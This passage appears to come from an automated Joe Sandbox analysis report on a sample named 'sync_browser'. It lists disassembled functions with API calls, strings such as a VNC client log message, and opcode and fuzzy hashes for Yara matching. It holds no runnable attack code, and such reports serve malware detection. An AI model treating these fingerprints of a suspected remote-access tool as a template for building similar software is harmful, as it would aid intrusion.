                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: DllGetVersion
                                                                    • API String ID: 3013587201-2861820592
                                                                    • Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                                    • Instruction ID: 772f17e1881d52dcf8452bae2101ade4aa23bb9727a9bba963607bfe6393a22b
                                                                    • Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                                    • Instruction Fuzzy Hash: E5018431A0C75582E7248F55F88003EB3A4FB88794F44413AFA9E82758DF3CD166CB10
                                                                    Function 00007FF6DC0EF6F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ClassMessageNamePost
                                                                    • String ID: WindowsScreenSaverClass
                                                                    • API String ID: 650004062-352026012
                                                                    • Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                    • Instruction ID: 6803f9be65b9b21848447a152a62d8280a343175a3ff2c1bf7a2bbfb94ebd555
                                                                    • Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                    • Instruction Fuzzy Hash: F7012C35A18A9981E7718B11F8147EA6394FB8CB84F400132DA8C87B58DE3CE1668B00
                                                                    Function 00007FF6DC0CD8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateErrorFileLastMapping
                                                                    • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                    • API String ID: 1790465270-3305976270
                                                                    • Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                    • Instruction ID: e53b0e4604c99687e7cb9be4f041bc9da4af2b094e45a66c7e4fa6f9655f3468
                                                                    • Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                    • Instruction Fuzzy Hash: CA018F32508BC582E7618B25A44036AB7A0E744374F548335E6BE826E8DF7CC4A6CB10
                                                                    Function 00007FF6DC0E89E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessageObjectSendSingleWait
                                                                    • String ID: vncclient.cpp : client Kill() called
                                                                    • API String ID: 353115698-1198714380
                                                                    • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                    • Instruction ID: d43f62fa1bd8ff448425a6817bd0194316c5f83ff9b2fd6752b6f88339f52923
                                                                    • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                    • Instruction Fuzzy Hash: 4601DF32604A8681FB589F25E8557AD2369EF84B74F084332CA3C866D4CF38D4A6C380
                                                                    Function 00007FF6DC0C6760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF6DC0C678B
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpen
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
                                                                    • API String ID: 47109696-713323490
                                                                    • Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                    • Instruction ID: 1db7ff65ad4c469827fced6f061d7c20895422d16c5e9682ce4c9195f300392d
                                                                    • Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                    • Instruction Fuzzy Hash: E7F09622A1868581EF208B25E40436EB3B4FF95B98F640136DA9C877A4DF7ED0A6C705
                                                                    Function 00007FF6DC12CEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: getpeernameinet_ntoa
                                                                    • String ID: <unavailable>
                                                                    • API String ID: 1982201544-1096956887
                                                                    • Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                    • Instruction ID: bd8af5b806339b42b3d5ab94b72a260b7391faa273a0ccd6ab3709cdfe0ce55e
                                                                    • Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                    • Instruction Fuzzy Hash: 59F08275A1874985EF209F00EC9126D7364FB88798F800032E54D43764DF3CE227CB00
                                                                    Function 00007FF6DC131740 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID:
                                                                    • API String ID: 1225357528-0
                                                                    • Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                    • Instruction ID: 8f2e6e85530c08a740d5b0b57f8b747b97e7ded22b9642d5186c268dbf923263
                                                                    • Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                    • Instruction Fuzzy Hash: 7311B101F1C1AA82FA40E766BA4177E42159F84BC8F481132FE0E8BB8BDE1DD4A38704
                                                                    Function 00007FF6DC157320 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • TlsGetValue.KERNEL32(?,?,00000000,00007FF6DC157423), ref: 00007FF6DC157338
                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF6DC157423), ref: 00007FF6DC157352
                                                                    • InitializeCriticalSection.KERNEL32(?,?,00000000,00007FF6DC157423), ref: 00007FF6DC15739C
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF6DC157423), ref: 00007FF6DC1573E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterInitializeLeaveValue
                                                                    • String ID:
                                                                    • API String ID: 3200804837-0
                                                                    • Opcode ID: 9b57fd7c55fe75021aeb7447fd861e4cda4a0a672ebbe4cb5d50cbd8ffadb556
                                                                    • Instruction ID: 73244e87e460e2dce9e98eedffc6c3cb4c810e3f5e294453e48f9ba6d9bd1911
                                                                    • Opcode Fuzzy Hash: 9b57fd7c55fe75021aeb7447fd861e4cda4a0a672ebbe4cb5d50cbd8ffadb556
                                                                    • Instruction Fuzzy Hash: 18213C31A29B5A92EA448F11E94027C73A8FB48B94F048136DA8D83750DF3CE4B7C740